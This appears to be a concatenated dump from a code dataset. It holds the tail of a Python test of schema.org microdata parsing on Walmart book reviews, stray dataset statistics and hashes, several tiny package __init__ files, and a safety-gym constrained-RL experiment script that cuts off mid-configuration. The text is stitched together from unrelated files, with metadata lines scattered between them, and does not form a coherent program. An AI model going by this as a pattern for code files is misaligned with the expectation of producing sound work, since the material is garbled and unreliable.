"author": "zngraceland,", "datePublished": "October 7, 2014", }, }, { "type": "http://schema.org/Review", "properties": { "name": "Exactly what I expected!", "reviewRating": { "type": "//schema.org/Rating", "properties": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", }, }, "reviewBody": "It was shipped much quicker than I thought it would be and the product was exactly what I thought it would be!See more", "author": "hbg6044,", "datePublished": "October 26, 2014", }, }, { "type": "http://schema.org/Review", "properties": { "name": "Perfect condition", "reviewRating": { "type": "//schema.org/Rating", "properties": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", }, }, "reviewBody": "Arrived well-packed and sooner than expectedSee more", "author": "DnD4U,", "datePublished": "September 13, 2016", }, }, ], "description": "Hardback: Dungeons &amp; Dragons Player's Handbook (Dungeons &amp; Dragons Core Rulebooks)", }, }, { "type": "//schema.org/BreadcrumbList", "properties": { "itemListElement": [ { "type": "//schema.org/ListItem", "properties": { "item": { "type": "//schema.org/Thing", "id": "//www.walmart.com/cp/3920", "properties": {"name": "Books"}, }, "position": "1", }, }, { "type": "//schema.org/ListItem", "properties": { "item": { "type": "//schema.org/Thing", "id": "//www.walmart.com/cp/582361", "properties": {"name": "Crafts & Hobbies Books"}, }, "position": "2", }, }, { "type": "//schema.org/ListItem", "properties": { "item": { "type": "//schema.org/Thing", "id": "//www.walmart.com/cp/9999446", "properties": {"name": "Game & Activity Books"}, }, "position": "3", }, }, { "type": "//schema.org/ListItem", "properties": { "item": { "type": "//schema.org/Thing", "id": "//www.walmart.com/cp/4085188", "properties": {"name": "Role Playing & Fantasy Books"}, }, "position": "4", }, }, ] }, }, ] expected = [ { "image": "https://i5.walmartimages.com/asr/ce1033ea-4934-4098-af07-16d0136689fd_1.5cebe0dbf47d95ddc489e506c8cc28f7.jpeg?odnHeight=450&odnWidth=450&odnBg=FFFFFF", "name": [ "Dungeons & Dragons Player's Handbook (Dungeons & Dragons Core Rulebooks)", "", ], "sku": "37784457", "aggregateRating": { "ratingValue": "4.8", "bestRating": "5", "reviewCount": "32", "type": "//schema.org/AggregateRating", }, "brand": "Wizards RPG Team", "offers": { "url": "/ip/Dungeons-Dragons-Player-s-Handbook-Dungeons-Dragons-Core-Rulebooks-9780786965601/37784457", "priceValidUntil": "", "priceCurrency": "USD", "price": "27.11", "availability": "//schema.org/InStock", "itemCondition": "//schema.org/NewCondition", "availableDeliveryMethod": "//schema.org/OnSitePickup", "availableAtOrFrom": { "name": "San Leandro Store", "branchCode": "2648", "type": "//schema.org/Place", }, "type": "//schema.org/Offer", }, "review": [ { "author": {"type": "http://schema.org/Person", "value": ""}, "type": "http://schema.org/Review", }, { "name": "Can't believe it!! :D", "reviewRating": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", "type": "//schema.org/Rating", }, "reviewBody": "I've been thinking of getting the Player's Handbook for a while now, but I always felt like it was too much for me to spend.. until I found this!! It's the same book, fully licenses and hard cover, but for a fraction of the price (and it came two days early!). Believe me, I was hesitant at first, but it's the real deal. Anyways.. hope all of y'all have a great day!See more", "author": "Liz,", "datePublished": "February 9, 2019", "type": "http://schema.org/Review", }, { "name": "Hardcore Hard Cover Awesome!", "reviewRating": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", "type": "//schema.org/Rating", }, "reviewBody": "The purchase experience was easy. Found exactly what I was looking for online and the free in store pick up was a breeze! The book itself is awesome! The art is GORGEOUS and the details are easy to understand. The book is pretty heavy though so I wouldn't suggest dropping it on your foot. Speaking from experience. Giggle.See more", "author": "AskinYoheC,", "datePublished": "March 1, 2017", "type": "http://schema.org/Review", }, { "name": "New Edition of Player Rules.", "reviewRating": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", "type": "//schema.org/Rating", }, "reviewBody": "Adds some new races and a new class. Great advantage/disadvantage feature. Same ole' D&D but better. Highly recommend for the newbie or veteran. NEEDED TO PLAY THE GAME EFFECTIVELYSee more", "author": "zngraceland,", "datePublished": "October 7, 2014", "type": "http://schema.org/Review", }, { "name": "Exactly what I expected!", "reviewRating": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", "type": "//schema.org/Rating", }, "reviewBody": "It was shipped much quicker than I thought it would be and the product was exactly what I thought it would be!See more", "author": "hbg6044,", "datePublished": "October 26, 2014", "type": "http://schema.org/Review", }, { "name": "Perfect condition", "reviewRating": { "worstRating": "1", "ratingValue": "5", "bestRating": "5", "type": "//schema.org/Rating", }, "reviewBody": "Arrived well-packed and sooner than expectedSee more", "author": "DnD4U,", "datePublished": "September 13, 2016", "type": "http://schema.org/Review", }, ], "description": "Hardback: Dungeons &amp; Dragons Player's Handbook (Dungeons &amp; Dragons Core Rulebooks)", "type": "http://schema.org/Product", }, { "//schema.org/BreadcrumbList": [ { "item": {"name": "Books", "type": "//schema.org/Thing"}, "position": "1", "type": "//schema.org/ListItem", }, { "item": { "name": "Crafts & Hobbies Books", "type": "//schema.org/Thing", }, "position": "2", "type": "//schema.org/ListItem", }, { "item": { "name": "Game & Activity Books", "type": "//schema.org/Thing", }, "position": "3", "type": "//schema.org/ListItem", }, { "item": { "name": "Role Playing & Fantasy Books", "type": "//schema.org/Thing", }, "position": "4", "type": "//schema.org/ListItem", }, ] }, ] for i, d in enumerate(data): assert format_microdata(d) == expected[i] if __name__ == "__main__": test_microdata()
48.465672
420
0.370658
1,143
16,236
5.252843
0.225722
0.083944
0.071452
0.045303
0.898068
0.871086
0.799134
0.764823
0.76016
0.76016
0
0.038153
0.509239
16,236
334
421
48.610778
0.715361
0
0
0.636364
0
0.036364
0.420485
0.046933
0
0
0
0
0.00303
1
0.00303
false
0
0.00303
0
0.006061
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
aaab047b4aca516dd8a43d9877a26b331c4c27e9
86
py
Python
radar_qcchecks/__init__.py
vlouf/radar-qcchecks
1a81660324623ad025d1ca405ed70f0a8a32cad6
[ "MIT" ]
null
null
null
radar_qcchecks/__init__.py
vlouf/radar-qcchecks
1a81660324623ad025d1ca405ed70f0a8a32cad6
[ "MIT" ]
null
null
null
radar_qcchecks/__init__.py
vlouf/radar-qcchecks
1a81660324623ad025d1ca405ed70f0a8a32cad6
[ "MIT" ]
null
null
null
from .radar_qcchecks import qccheck_radar_odim from .radar_qcchecks import NoRainError
43
46
0.895349
12
86
6.083333
0.583333
0.246575
0.465753
0.630137
0
0
0
0
0
0
0
0
0.081395
86
2
47
43
0.924051
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
aaae008fc8d67e5ece4541f5cccfad5e929032fa
165
py
Python
CenterNet/__init__.py
NichaA/CenterNet-pytorch-lightning
b9d38e5de6bf69ebf780501ae3002018f35585e5
[ "Apache-2.0" ]
43
2021-02-26T15:04:42.000Z
2022-03-22T03:02:16.000Z
CenterNet/__init__.py
NichaA/CenterNet-pytorch-lightning
b9d38e5de6bf69ebf780501ae3002018f35585e5
[ "Apache-2.0" ]
31
2021-03-05T07:53:15.000Z
2022-03-31T02:07:41.000Z
CenterNet/__init__.py
NichaA/CenterNet-pytorch-lightning
b9d38e5de6bf69ebf780501ae3002018f35585e5
[ "Apache-2.0" ]
5
2021-04-18T16:51:56.000Z
2022-01-09T21:46:51.000Z
from CenterNet.centernet import CenterNet from CenterNet.centernet_detection import CenterNetDetection from CenterNet.centernet_multi_pose import CenterNetMultiPose
41.25
61
0.909091
18
165
8.166667
0.444444
0.265306
0.44898
0
0
0
0
0
0
0
0
0
0.072727
165
3
62
55
0.960784
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
aab50ec352bbe3507baeb073df885917fe5651df
156
py
Python
src/kw_notebook_core/bokeh.py
wakita/kw_notebook_core
1acbe074f3610ab0308ee7b56db1efe92553129d
[ "MIT" ]
null
null
null
src/kw_notebook_core/bokeh.py
wakita/kw_notebook_core
1acbe074f3610ab0308ee7b56db1efe92553129d
[ "MIT" ]
null
null
null
src/kw_notebook_core/bokeh.py
wakita/kw_notebook_core
1acbe074f3610ab0308ee7b56db1efe92553129d
[ "MIT" ]
null
null
null
def initialize(): from bokeh.plotting import output_notebook, show, figure from bokeh.models import * from bokeh.layouts import * output_notebook()
26
58
0.762821
20
156
5.85
0.6
0.230769
0.34188
0
0
0
0
0
0
0
0
0
0.160256
156
5
59
31.2
0.89313
0
0
0
0
0
0
0
0
0
0
0
0
1
0.2
true
0
0.6
0
0.8
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
aabb63f354657bb24ae7801957a1e6495b53531a
25
py
Python
src/hx711_multi/__init__.py
ASU-CS-Research/hx711-multi
72db6c66b408896833c14748776c505bc516c26f
[ "MIT" ]
null
null
null
src/hx711_multi/__init__.py
ASU-CS-Research/hx711-multi
72db6c66b408896833c14748776c505bc516c26f
[ "MIT" ]
null
null
null
src/hx711_multi/__init__.py
ASU-CS-Research/hx711-multi
72db6c66b408896833c14748776c505bc516c26f
[ "MIT" ]
null
null
null
from .hx711 import HX711
12.5
24
0.8
4
25
5
0.75
0
0
0
0
0
0
0
0
0
0
0.285714
0.16
25
1
25
25
0.666667
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
630d486f169774544ec942266bea50f07094a733
123
py
Python
moviemaker3/stacks/__init__.py
friedrichromstedt/moviemaker3
7941a06d43bbbb63e45496044040a163ab97d78d
[ "MIT" ]
1
2018-12-30T18:40:07.000Z
2018-12-30T18:40:07.000Z
moviemaker3/stacks/__init__.py
friedrichromstedt/moviemaker3
7941a06d43bbbb63e45496044040a163ab97d78d
[ "MIT" ]
null
null
null
moviemaker3/stacks/__init__.py
friedrichromstedt/moviemaker3
7941a06d43bbbb63e45496044040a163ab97d78d
[ "MIT" ]
null
null
null
from moviemaker3.stacks.additive import * from moviemaker3.stacks.alpha import * from moviemaker3.stacks.weighted import *
30.75
41
0.829268
15
123
6.8
0.466667
0.441176
0.617647
0.529412
0
0
0
0
0
0
0
0.027027
0.097561
123
3
42
41
0.891892
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
630d50342a797675a7e3bd7eef06e31542c2d4bf
34,912
py
Python
safety_gym/algo/safety-starter-agents/scripts/experiment.py
intelligent-control-lab/Model-free-Safe-Controlfor-Zero-Violation-Reinforcement-Learning
fe5aadbef719e572bb36f64b6ab95ec24b5aed9a
[ "MIT" ]
2
2022-03-15T20:29:05.000Z
2022-03-31T03:59:22.000Z
safety_gym/algo/safety-starter-agents/scripts/experiment.py
intelligent-control-lab/Model-free-Safe-Controlfor-Zero-Violation-Reinforcement-Learning
fe5aadbef719e572bb36f64b6ab95ec24b5aed9a
[ "MIT" ]
null
null
null
safety_gym/algo/safety-starter-agents/scripts/experiment.py
intelligent-control-lab/Model-free-Safe-Controlfor-Zero-Violation-Reinforcement-Learning
fe5aadbef719e572bb36f64b6ab95ec24b5aed9a
[ "MIT" ]
1
2022-02-06T09:24:30.000Z
2022-02-06T09:24:30.000Z
#!/usr/bin/env python import gym import safety_gym import safe_rl from safe_rl.utils.run_utils import setup_logger_kwargs from safe_rl.utils.mpi_tools import mpi_fork from safety_gym.envs.engine import Engine # Point # Goal1/2 (60,2) # Push1/2 (76,2) # Button1/2 (76,2) # Robot # Goal1/2 (72,2) # Push1/2 (88,2) # Button1/2 (88,2) # Doggo # Goal1/2 (104,12) # Push1/2 (120,12) # Button1/2 (120,2) def main(robot, task, algo, seed, exp_name, cpu, args): # Verify experiment robot_list = ['point', 'car', 'doggo'] task_list = ['mygoal1','mygoal4', "mypush1","mypush4", "mygoal1_pillars", "mygoal4_pillars",'goal1', 'goal2', 'button1', 'button2', 'push1', 'push2'] algo_list = ['ppo', 'ppo_lagrangian', 'trpo', 'trpo_lagrangian', 'cpo', 'ppo_adamba', 'trpo_adamba','ppo_adamba_sc','trpo_adamba_sc'] algo = algo.lower() task = task.capitalize() robot = robot.capitalize() assert algo in algo_list, "Invalid algo" assert task.lower() in task_list, "Invalid task" assert robot.lower() in robot_list, "Invalid robot" # Hyperparameters if exp_name == None: if "pillars" in task.lower(): if 'adamba' not in algo.lower(): if args.cpc: raise NotImplementedError exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + "_" + "ctrlrange-" + str(args.ctrlrange) else: if args.index[0:10] == 'projection': if args.cpc: exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + '_' + args.index + '_margin-' + str(args.margin) + "_" + "threshold-" + str(args.threshold) + "_" + "ctrlrange-" + str(args.ctrlrange) + "_" + "cpc-" + str(args.cpc) + "_" + "cpc_coef-" + str(args.cpc_coef)+ "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef) else: exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + '_' + args.index + '_margin-' + str(args.margin) + "_" + "threshold-" + str(args.threshold) + "_" + "ctrlrange-" + str(args.ctrlrange) + "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef) exp_name += "_simulation_fixed" elif args.index == 'adaptive': if args.cpc: exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + '_' + args.index + '_k-' + str(args.k) + "_" + "sigma-" + str(args.sigma) + "_" + 'n-' + str(args.n) + "_" + "threshold-" + str(args.threshold) + '_'+ "ctrlrange-" + str(args.ctrlrange) + "_" + "cpc-" + str(args.cpc) + "_" + "cpc_coef-" + str(args.cpc_coef)+ "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef) else: exp_name = algo + '_' + robot + task + 'pillars_size-' + str(args.pillars_size) + '_' + args.index + '_k-' + str(args.k) + "_" + "sigma-" + str(args.sigma) + "_" + 'n-' + str(args.n) + "_" + "threshold-" + str(args.threshold) + '_'+ "ctrlrange-" + str(args.ctrlrange) + "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef) exp_name += "_simulation_fixed" else: raise NotImplementedError else: if 'adamba' not in algo.lower(): if args.cpc: raise NotImplementedError exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + "_" + "ctrlrange-" + str(args.ctrlrange) else: if args.index[0:10] == 'projection': if args.cpc: exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + '_' + args.index + '_margin-' + str(args.margin) + "_" + "threshold-" + str(args.threshold) + "_" + "ctrlrange-" + str(args.ctrlrange) + "_" + "cpc-" + str(args.cpc) + "_" + "cpc_coef-" + str(args.cpc_coef)+ "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef) else: exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + '_' + args.index + '_margin-' + str(args.margin) + "_" + "threshold-" + str(args.threshold) + "_" + "ctrlrange-" + str(args.ctrlrange) + "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef) exp_name += "_simulation_fixed" elif args.index == 'adaptive': if args.cpc: exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + '_' + args.index + '_k-' + str(args.k) + "_" + "sigma-" + str(args.sigma) + "_" + 'n-' + str(args.n) + "_" + "threshold-" + str(args.threshold) + '_'+ "ctrlrange-" + str(args.ctrlrange) + "_" + "cpc-" + str(args.cpc) + "_" + "cpc_coef-" + str(args.cpc_coef)+ "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef) else: exp_name = algo + '_' + robot + task + 'hazards_size-' + str(args.hazards_size) + '_' + args.index + '_k-' + str(args.k) + "_" + "sigma-" + str(args.sigma) + "_" + 'n-' + str(args.n) + "_" + "threshold-" + str(args.threshold) + '_'+ "ctrlrange-" + str(args.ctrlrange) + "_" + "pre_execute-" + str(args.pre_execute) + "_" + "pre_execute_coef" + "-" + str(args.pre_execute_coef) exp_name += "_simulation_fixed" else: raise NotImplementedError if robot=='Doggo': num_steps = 1e8 steps_per_epoch = 60000 else: num_steps = 1e7 steps_per_epoch = 30000 epochs = int(num_steps / steps_per_epoch) save_freq = 50 target_kl = 0.01 cost_lim = 0 # Fork for parallelizing mpi_fork(cpu) # Prepare Logger logger_kwargs = setup_logger_kwargs(exp_name, seed) # Algo and Env algo = eval('safe_rl.'+algo) if task == "Mygoal1": # finite time convergence test suite # config = { # 'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point # # finite time convergence test suite modification # 'robot_placements': None, # Robot placements list (defaults to full extents) # 'robot_locations': [[0.0, 0.0]], # Explicitly place robot XY coordinate # 'robot_keepout': 0.0, # Needs to be set to match the robot XML used # # Hazardous areas # 'hazards_placements': None, # Placements list for hazards (defaults to full extents) # 'hazards_locations': [[-0.3, -0.3]], # Fixed locations to override placements # 'hazards_keepout': 0.0, # Radius of hazard keepout for placement # 'hazards_num': 1, # 'hazards_size': 0.5, # 'task': 'goal', # 'observation_flatten': True, # Flatten observation into a vector # 'observe_sensors': True, # Observe all sensor data from simulator # # Sensor observations # # Specify which sensors to add to observation space # 'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'], # 'sensors_hinge_joints': True, # Observe named joint position / velocity sensors # 'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors # 'sensors_angle_components': True, # Observe sin/cos theta instead of theta # #observe goal/box/... # 'observe_goal_dist': False, # Observe the distance to the goal # 'observe_goal_comp': False, # Observe a compass vector to the goal # 'observe_goal_lidar': True, # Observe the goal with a lidar sensor # 'observe_box_comp': False, # Observe the box with a compass # 'observe_box_lidar': False, # Observe the box with a lidar # 'observe_circle': False, # Observe the origin with a lidar # 'observe_remaining': False, # Observe the fraction of steps remaining # 'observe_walls': False, # Observe the walls with a lidar space # 'observe_hazards': True, # Observe the vector from agent to hazards # 'observe_vases': True, # Observe the vector from agent to vases # 'observe_pillars': False, # Lidar observation of pillar object positions # 'observe_buttons': False, # Lidar observation of button object positions # 'observe_gremlins': False, # Gremlins are observed with lidar-like space # 'observe_vision': False, # Observe vision from the robot # # Constraints - flags which can be turned on # # By default, no constraints are enabled, and all costs are indicator functions. # 'constrain_hazards': True, # Constrain robot from being in hazardous areas # 'constrain_vases': False, # Constrain frobot from touching objects # 'constrain_pillars': False, # Immovable obstacles in the environment # 'constrain_buttons': False, # Penalize pressing incorrect buttons # 'constrain_gremlins': False, # Moving objects that must be avoided # # cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable. # 'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost. # #lidar setting # 'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance) # 'lidar_num_bins': 16, # #num setting # 'vases_num': 0, # # dt perhaps? # # Frameskip is the number of physics simulation steps per environment step # # Frameskip is sampled as a binomial distribution # # For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip) # 'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip) # 'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution) # } config = { 'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point 'task': 'goal', 'observation_flatten': True, # Flatten observation into a vector 'observe_sensors': True, # Observe all sensor data from simulator # Sensor observations # Specify which sensors to add to observation space 'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'], 'sensors_hinge_joints': True, # Observe named joint position / velocity sensors 'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors 'sensors_angle_components': True, # Observe sin/cos theta instead of theta #observe goal/box/... 'observe_goal_dist': False, # Observe the distance to the goal 'observe_goal_comp': False, # Observe a compass vector to the goal 'observe_goal_lidar': True, # Observe the goal with a lidar sensor 'observe_box_comp': False, # Observe the box with a compass 'observe_box_lidar': False, # Observe the box with a lidar 'observe_circle': False, # Observe the origin with a lidar 'observe_remaining': False, # Observe the fraction of steps remaining 'observe_walls': False, # Observe the walls with a lidar space 'observe_hazards': True, # Observe the vector from agent to hazards 'observe_vases': True, # Observe the vector from agent to vases 'observe_pillars': False, # Lidar observation of pillar object positions 'observe_buttons': False, # Lidar observation of button object positions 'observe_gremlins': False, # Gremlins are observed with lidar-like space 'observe_vision': False, # Observe vision from the robot # Constraints - flags which can be turned on # By default, no constraints are enabled, and all costs are indicator functions. 'constrain_hazards': True, # Constrain robot from being in hazardous areas 'constrain_vases': False, # Constrain frobot from touching objects 'constrain_pillars': False, # Immovable obstacles in the environment 'constrain_buttons': False, # Penalize pressing incorrect buttons 'constrain_gremlins': False, # Moving objects that must be avoided # cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable. 'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost. #lidar setting 'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance) 'lidar_num_bins': 16, #num setting 'hazards_num': 1, 'hazards_size': args.hazards_size, 'vases_num': 0, # Frameskip is the number of physics simulation steps per environment step # Frameskip is sampled as a binomial distribution # For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip) 'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip) 'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution) } if task == "Mygoal4": config = { 'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point 'task': 'goal', 'observation_flatten': True, # Flatten observation into a vector 'observe_sensors': True, # Observe all sensor data from simulator # Sensor observations # Specify which sensors to add to observation space 'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'], 'sensors_hinge_joints': True, # Observe named joint position / velocity sensors 'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors 'sensors_angle_components': True, # Observe sin/cos theta instead of theta #observe goal/box/... 'observe_goal_dist': False, # Observe the distance to the goal 'observe_goal_comp': False, # Observe a compass vector to the goal 'observe_goal_lidar': True, # Observe the goal with a lidar sensor 'observe_box_comp': False, # Observe the box with a compass 'observe_box_lidar': False, # Observe the box with a lidar 'observe_circle': False, # Observe the origin with a lidar 'observe_remaining': False, # Observe the fraction of steps remaining 'observe_walls': False, # Observe the walls with a lidar space 'observe_hazards': True, # Observe the vector from agent to hazards 'observe_vases': True, # Observe the vector from agent to vases 'observe_pillars': False, # Lidar observation of pillar object positions 'observe_buttons': False, # Lidar observation of button object positions 'observe_gremlins': False, # Gremlins are observed with lidar-like space 'observe_vision': False, # Observe vision from the robot # Constraints - flags which can be turned on # By default, no constraints are enabled, and all costs are indicator functions. 'constrain_hazards': True, # Constrain robot from being in hazardous areas 'constrain_vases': False, # Constrain frobot from touching objects 'constrain_pillars': False, # Immovable obstacles in the environment 'constrain_buttons': False, # Penalize pressing incorrect buttons 'constrain_gremlins': False, # Moving objects that must be avoided # cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable. 'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost. #lidar setting 'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance) 'lidar_num_bins': 16, #num setting 'hazards_num': 4, 'hazards_size': args.hazards_size, 'vases_num': 0, # Frameskip is the number of physics simulation steps per environment step # Frameskip is sampled as a binomial distribution # For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip) 'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip) 'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution) } if task == "Mypush4": config = { 'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point 'task': 'push', 'box_size': 0.2, 'box_null_dist': 0, 'observation_flatten': True, # Flatten observation into a vector 'observe_sensors': True, # Observe all sensor data from simulator # Sensor observations # Specify which sensors to add to observation space 'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'], 'sensors_hinge_joints': True, # Observe named joint position / velocity sensors 'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors 'sensors_angle_components': True, # Observe sin/cos theta instead of theta #observe goal/box/... 'observe_goal_dist': False, # Observe the distance to the goal 'observe_goal_comp': False, # Observe a compass vector to the goal 'observe_goal_lidar': True, # Observe the goal with a lidar sensor 'observe_box_comp': False, # Observe the box with a compass 'observe_box_lidar': True, # Observe the box with a lidar 'observe_circle': False, # Observe the origin with a lidar 'observe_remaining': False, # Observe the fraction of steps remaining 'observe_walls': False, # Observe the walls with a lidar space 'observe_hazards': True, # Observe the vector from agent to hazards 'observe_vases': True, # Observe the vector from agent to vases 'observe_pillars': False, # Lidar observation of pillar object positions 'observe_buttons': False, # Lidar observation of button object positions 'observe_gremlins': False, # Gremlins are observed with lidar-like space 'observe_vision': False, # Observe vision from the robot # Constraints - flags which can be turned on # By default, no constraints are enabled, and all costs are indicator functions. 'constrain_hazards': True, # Constrain robot from being in hazardous areas 'constrain_vases': False, # Constrain frobot from touching objects 'constrain_pillars': False, # Immovable obstacles in the environment 'constrain_buttons': False, # Penalize pressing incorrect buttons 'constrain_gremlins': False, # Moving objects that must be avoided # cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable. 'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost. #lidar setting 'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance) 'lidar_num_bins': 16, #num setting 'hazards_num': 4, 'hazards_size': args.hazards_size, 'vases_num': 0, # Frameskip is the number of physics simulation steps per environment step # Frameskip is sampled as a binomial distribution # For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip) 'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip) 'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution) } if task == "Mypush1": config = { 'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point 'task': 'push', 'box_size': 0.2, 'box_null_dist': 0, 'observation_flatten': True, # Flatten observation into a vector 'observe_sensors': True, # Observe all sensor data from simulator # Sensor observations # Specify which sensors to add to observation space 'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'], 'sensors_hinge_joints': True, # Observe named joint position / velocity sensors 'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors 'sensors_angle_components': True, # Observe sin/cos theta instead of theta #observe goal/box/... 'observe_goal_dist': False, # Observe the distance to the goal 'observe_goal_comp': False, # Observe a compass vector to the goal 'observe_goal_lidar': True, # Observe the goal with a lidar sensor 'observe_box_comp': False, # Observe the box with a compass 'observe_box_lidar': True, # Observe the box with a lidar 'observe_circle': False, # Observe the origin with a lidar 'observe_remaining': False, # Observe the fraction of steps remaining 'observe_walls': False, # Observe the walls with a lidar space 'observe_hazards': True, # Observe the vector from agent to hazards 'observe_vases': True, # Observe the vector from agent to vases 'observe_pillars': False, # Lidar observation of pillar object positions 'observe_buttons': False, # Lidar observation of button object positions 'observe_gremlins': False, # Gremlins are observed with lidar-like space 'observe_vision': False, # Observe vision from the robot # Constraints - flags which can be turned on # By default, no constraints are enabled, and all costs are indicator functions. 'constrain_hazards': True, # Constrain robot from being in hazardous areas 'constrain_vases': False, # Constrain frobot from touching objects 'constrain_pillars': False, # Immovable obstacles in the environment 'constrain_buttons': False, # Penalize pressing incorrect buttons 'constrain_gremlins': False, # Moving objects that must be avoided # cost discrete/continuous. As for AdamBA, I guess continuous cost is more suitable. 'constrain_indicator': False, # If true, all costs are either 1 or 0 for a given step. If false, then we get dense cost. #lidar setting 'lidar_max_dist': None, # Maximum distance for lidar sensitivity (if None, exponential distance) 'lidar_num_bins': 16, #num setting 'hazards_num': 1, 'hazards_size': args.hazards_size, 'vases_num': 0, # Frameskip is the number of physics simulation steps per environment step # Frameskip is sampled as a binomial distribution # For deterministic steps, set frameskip_binom_p = 1.0 (always take max frameskip) 'frameskip_binom_n': 10, # Number of draws trials in binomial distribution (max frameskip) 'frameskip_binom_p': 1.0 # Probability of trial return (controls distribution) } if task == "Mygoal4_pillars": config = { 'robot_base': 'xmls/point.xml', # dt in xml, default 0.002s for point 'task': 'goal', 'observation_flatten': True, # Flatten observation into a vector 'observe_sensors': True, # Observe all sensor data from simulator # Sensor observations # Specify which sensors to add to observation space 'sensors_obs': ['accelerometer', 'velocimeter', 'gyro', 'magnetometer'], 'sensors_hinge_joints': True, # Observe named joint position / velocity sensors 'sensors_ball_joints': True, # Observe named balljoint position / velocity sensors 'sensors_angle_components': True, # Observe sin/cos theta instead of theta #observe goal/box/... 'observe_goal_dist': False, # Observe the distance to the goal 'observe_goal_comp': False, # Observe a compass vector to the goal 'observe_goal_lidar': True, # Observe the goal with a lidar sensor 'observe_box_comp': False, # Observe the box with a compass 'observe_box_lidar': False, # Observe the box with a lidar 'observe_circle': False, # Observe the origin with a lidar 'observe_remaining': False, # Observe the fraction of steps remaining 'observe_walls': False, # Observe the walls with a lidar space 'observe_hazards': False, # Observe the vector from agent to hazards 'observe_vases': False, # Observe the vector from agent to vases 'observe_pillars': True, # Lidar observation of pillar object positions 'observe_buttons': False, # Lidar observation of button object positions 